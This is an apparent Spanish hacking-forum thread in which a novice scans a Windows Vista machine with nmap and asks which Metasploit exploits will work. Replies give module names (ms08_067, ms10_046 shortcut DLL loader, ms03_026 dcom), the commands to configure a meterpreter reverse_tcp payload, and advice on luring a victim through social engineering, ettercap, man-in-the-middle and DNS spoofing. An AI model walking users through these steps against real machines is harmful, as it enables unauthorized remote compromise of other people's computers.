Buenas,me prestais ayuda con un Windows Vista??

[ps3ps3ps3]

Hola,buenas a todos,estoy aqui intentando meterme en mi Windows Vista,le hago un scan con nmap:

nmap -sS -PN -sV -vv 192.168.1.100 y me da esto:

PORT      STATE SERVICE           VERSION
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn?
445/tcp   open  netbios-ssn
5357/tcp  open  unknown
10000/tcp open  snet-sensor-mgmt?

Nmap me dice que simplemente es un Windows,y pienso... voy a probar con el exploit ms08_067_netapi pero me da el siguiente error:

• Started reverse handler on 192.168.1.136:4444
• Automatically detecting the target...
• Fingerprint: Windows Vista Home Basic - Service Pack 2 - lang:Unknown
• We could not detect the language pack, defaulting to English
[-] Exploit exception: No matching target

Podeis decirme algun exploit para Vista o si hago algo mal?? Muchas gracias.

[miyamoto340]

We could not detect the language pack, defaulting to English

Imagino que has de lanzar el exploit para un windows en español.
Estas seguro de que el sistema es vulnerable a ese exploit?

[JULY]

Amigo el problema es el target ese exploit
es para wind xp

para verificar eso pones show targets

para buscar exploit del so que quieras esta el search

como por ejemplo search linux


saludosssss

[keVlar]

El exploit ms08-067 no funciona en windows vista (solo en 2k,xp y server 2003. Mas info : http://www.metasploit.com/modules/exploit/windows/smb/ms08_067_netapi) pero podrias probar con el icon_dllloader (exploit/windows/browser/ms10_046_shortcut_icon_dllloader).

Salu2

[ps3ps3ps3]

Gracias por la ayuda de todos : D

keVlar,para usar ese exploit deberia poner en metasploit...

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

set PAYLOAD windows/meterpreter/reverse_tcp? o bind_tcp? (si no es molestia,podria alguien decirme la  diferencia?)

set rhost (ip equipo remoto)

set lhost (ip equipo local)

exploit

Y una cosilla mas,hay algun exploit para alguno de esos puertos? 135,139,445 ?? Perdonen mi ignorancia,pero llevo un par de dias toqueteando metasploit y aun no se bien como usarlo,Saludos y gracias.

[keVlar]

Gracias por la ayuda de todos : D

keVlar,para usar ese exploit deberia poner en metasploit...

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

set PAYLOAD windows/meterpreter/reverse_tcp? o bind_tcp? (si no es molestia,podria alguien decirme la  diferencia?)

set rhost (ip equipo remoto)

set lhost (ip equipo local)

exploit

Y una cosilla mas,hay algun exploit para alguno de esos puertos? 135,139,445 ?? Perdonen mi ignorancia,pero llevo un par de dias toqueteando metasploit y aun no se bien como usarlo,Saludos y gracias.

reverse_tcp significa que es el otro ordenador el que se conecta a ti para darte la shell y en el bind_tcp las conexiones se hacen de tu ordenador al suyo (en principio es mejor reverse_tcp por lo de los firewalls  ).

A los puertos 139 y 445 se puede acceder con el netapi si tienes el so es alguno de los q dije antes (2k,xp,2003). Para el 135 se utiliza el dcom (exploit/windows/dcerpc/ms03_026_dcom) pero tmb es para esos so. (http://www.metasploit.com/modules/exploit/windows/dcerpc/ms03_026_dcom)

Y el lnk es en modo servidor a si que la victima tiene que conectarse a la direccion (la que te pone cuando lo inicias : "Server started at http://ip:puerto/identificador") que especifiques (si no especificas el srvhost se pondra automaticamente tu ip).

Si quieres que la direccion sea del tipo http://ip:puerto (sin identificador) en algun exploit (modo servidor) q pone el id por defecto basta con poner "set uripath /"

Salu2

[ps3ps3ps3]

Ok,gracias entonces con ese metodo,puedo hacer que cuando desde el windows vista me meta en www.google.com o la pag que sea,consiga la shell en meterpreter?? Gracias,me lio bastante,tengo que leer mas...

Saludos.

[keVlar]

Ok,gracias entonces con ese metodo,puedo hacer que cuando desde el windows vista me meta en www.google.com o la pag que sea,consiga la shell en meterpreter?? Gracias,me lio bastante,tengo que leer mas...

Saludos.

Si, pero la dirección en la que se tendria que meter seria la ip desde la que has iniciado el servidor (tu ip local). Ej: "http://192.168.1.34" (asi que hay que utilizar algun método para que entre : ingeniería social, herramientas tipo "ettercap"...)

[Darkhack07]

Ok,gracias entonces con ese metodo,puedo hacer que cuando desde el windows vista me meta en www.google.com o la pag que sea,consiga la shell en meterpreter?? Gracias,me lio bastante,tengo que leer mas...

Saludos.

No, para hacer eso, que al ingresar una url de una web como google, lo que debes hacer es poner tu IP como servidor y despues hacer un Main in the middle, redireccionar los accesos a www.google.com a tu IP (ej. 1.196.193.33).

Main in the middle, DNS Spoofing,

Saludos, Darkhack07